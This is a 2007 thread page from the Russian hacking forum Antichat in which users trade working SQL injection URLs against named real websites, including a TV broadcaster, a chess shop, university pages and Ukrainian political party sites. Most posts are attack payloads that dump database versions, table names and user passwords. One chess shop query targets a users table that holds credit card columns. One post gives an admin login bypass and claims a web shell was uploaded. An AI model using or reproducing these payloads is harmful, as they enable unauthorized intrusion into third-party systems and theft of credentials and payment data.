ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2721  
Старый 17.07.2007, 01:19
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Цитата:
Сообщение от tbody  
Вот тут посмотрите
http://blogs.xnet.lv/index.php?zoomzina=2532+union+select+1,2,3/*
Код:
http://blogs.xnet.lv/index.php?zoomzina=-2532+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16/*
 
Ответить с цитированием

  #2722  
Старый 17.07.2007, 02:34
Аватар для Grema
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

Код:
http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
1,4,7,12 видимые... они в самом низу.. помогите надыбать таблице и т.д. очень надо)
 
Ответить с цитированием

  #2723  
Старый 17.07.2007, 02:50
Аватар для iv.
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Grema
Получите, распишитесь.
Цитата:
http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,pass,5,6,nam e,8,9,10,11,id,13,14%20from%20users/*
 
Ответить с цитированием

  #2724  
Старый 17.07.2007, 03:45
Аватар для tbody
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

http://www.sexshop-romantic.ro/sex-shop/?id=69+union+select+1,2,3--
 
Ответить с цитированием

  #2725  
Старый 17.07.2007, 09:43
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

elpa.coe.missouri.edu
Код:
http://elpa.coe.missouri.edu/index.php?page=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #2726  
Старый 17.07.2007, 10:56
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.forsleep.ru/index.php?rn_id=-14+union+select+1,concat_ws(0x203a20,table_name,column_name),3,4,5,6,7+from+information_schema.columns/*
 
Ответить с цитированием

  #2727  
Старый 17.07.2007, 15:09
Аватар для k8^cat.YOU
k8^cat.YOU
Новичок
Регистрация: 12.07.2007
Сообщений: 13
Провел на форуме:
76147

Репутация: 32
По умолчанию


Межгосударственная телерадиокомпания «Мир»

mysql 4, magic_quotes off, file_priv off.
http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

и вообще сайт очень насыщен sql-инекциями

ps.
http://www.mirtv.ru/admin/
login: admin' or 1=1/*
pass: k8<3you

шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм

Последний раз редактировалось k8^cat.YOU; 17.07.2007 в 15:12..
 
Ответить с цитированием

  #2728  
Старый 17.07.2007, 17:44
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Цитата:
Сообщение от k8^cat.YOU  

Межгосударственная телерадиокомпания «Мир»

mysql 4, magic_quotes off, file_priv off.
http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

и вообще сайт очень насыщен sql-инекциями

ps.
http://www.mirtv.ru/admin/
login: admin' or 1=1/*
pass: k8<3you

шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм
Странно.. шелл залил, но листинг директорий запрещен... бага банальная.. но лови +2
 
Ответить с цитированием

  #2729  
Старый 17.07.2007, 20:49
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shop
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('nachrichten','acpplayers','bundesligaspieler' ,'cbuser','dailychess','dedownload','deevent','des upport','deutschmann_pw','deutschmann_shop','downl oad_e','dtproperties','elturco','esnews','events_e ','lapista','news','pictureup','products','product s_es','servernews_es','shopd','spotlight','support ','support_e','sysconstraints','syssegments','trai ning','turnierraum','usdollar','users'))--
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+COLUMN_NAME+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='u sers'+AND+COLUMN_NAME+NOT+IN+('user_id','user_user name','user_password','user_email','user_street',' user_city','user_state','user_zip','user_ccnumber' ,'user_cctype','user_ccexpires','user_ccname'))--
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_use rname+as+nvarchar)%2B%27%3A%27%2Bcast(user_passwor d+as+nvarchar)+from+users+where+user_id=1)--
 
Ответить с цитированием

  #2730  
Старый 18.07.2007, 00:04
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Цитата:
http://www.greenparty.ua/?p=news_a&ln=3&cats=-1'+union+select+user()/*
ПАРТИЯ ЗЕЛЁНЫХ Украины
Цитата:
http://www.spu.in.ua/ua/search/?search_word=1'
Социалистическая партия Украины (ток чёт я ту не разобрался)

Последний раз редактировалось Y.Dmitriy; 18.07.2007 в 00:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ